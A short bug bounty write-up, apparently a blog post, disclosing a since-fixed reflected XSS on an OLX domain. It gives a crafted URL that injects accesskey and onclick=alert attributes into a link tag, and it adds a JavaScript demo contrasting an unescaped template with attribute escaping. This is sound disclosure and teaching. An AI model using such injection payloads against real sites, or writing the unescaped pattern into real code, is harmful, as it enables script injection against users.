OLX Bug Bounty: Reflected XSS

Abay
Mar 13, 2019 · 1 min read

Who would have thought there was a bug to be found even on a 404 Not Found page, right?

This is a write-up of a reflected XSS I found on one of OLX's in-scope domains, sharjah.dubizzle.com.


Steps to Reproduce

  • Visit https://sharjah.dubizzle.com/property-for-sale/land" accesskey="X" onclick=alert(1337) codelatte="/2018/10/10/commercial-land-for-sale-in-al-sajja-12/ (you can copy and paste).
  • The XSS is reflected inside an HTML link tag.
  • Press ALT + SHIFT + X on the keyboard to trigger the XSS payload.
  • An alert will show up.
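
Why the path in the first step turns into extra attributes, and how attribute escaping stops it, shown as an added example that is not part of the original write-up or OLX's code. The `rel="canonical"` template, the `example.test` host and all function names are assumptions made for illustration.

```javascript
// Added example: hypothetical 404-page template helpers, not OLX/dubizzle code.

// Vulnerable: the request path is concatenated into the attribute unescaped,
// so a double quote in the path closes href and starts new attributes.
function renderLinkUnsafe(path) {
  return '<link rel="canonical" href="https://example.test' + path + '">';
}

// Escape the characters that matter inside a quoted attribute value.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Hardened: same template, but the path is attribute-escaped first.
function renderLinkSafe(path) {
  return '<link rel="canonical" href="https://example.test' + escapeAttr(path) + '">';
}

// Minimal attribute-name lister for a single tag (enough for this demo,
// not a general HTML parser).
function attributeNames(tag) {
  const names = [];
  const re = /([^\s"'<>\/=]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?/g;
  const inner = tag.replace(/^<\w+/, '').replace(/>$/, '');
  let m;
  while ((m = re.exec(inner)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Path taken from the reproduction step above.
const samplePath = '/property-for-sale/land" accesskey="X" onclick=alert(1337) ' +
  'codelatte="/2018/10/10/commercial-land-for-sale-in-al-sajja-12/';

console.log(attributeNames(renderLinkUnsafe(samplePath))); // attributes the browser would see
console.log(attributeNames(renderLinkSafe(samplePath)));   // only the template's own attributes
```

With the unescaped template the tag gains `accesskey` and `onclick`, which is what makes the key combination fire the handler; with escaping the whole path stays inside `href`.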

After the bug was fixed, my name was added to the Security Hall of Fame 😎

Reference

https://hackerone.com/reports/504984 (Original Report).
https://portswigger.net/blog/xss-in-hidden-input-fields (XSS in hidden input fields).

PS: Sorry, maybe there are some irreverent words. It’s semi-google-translate. Hopefully you understand that xD
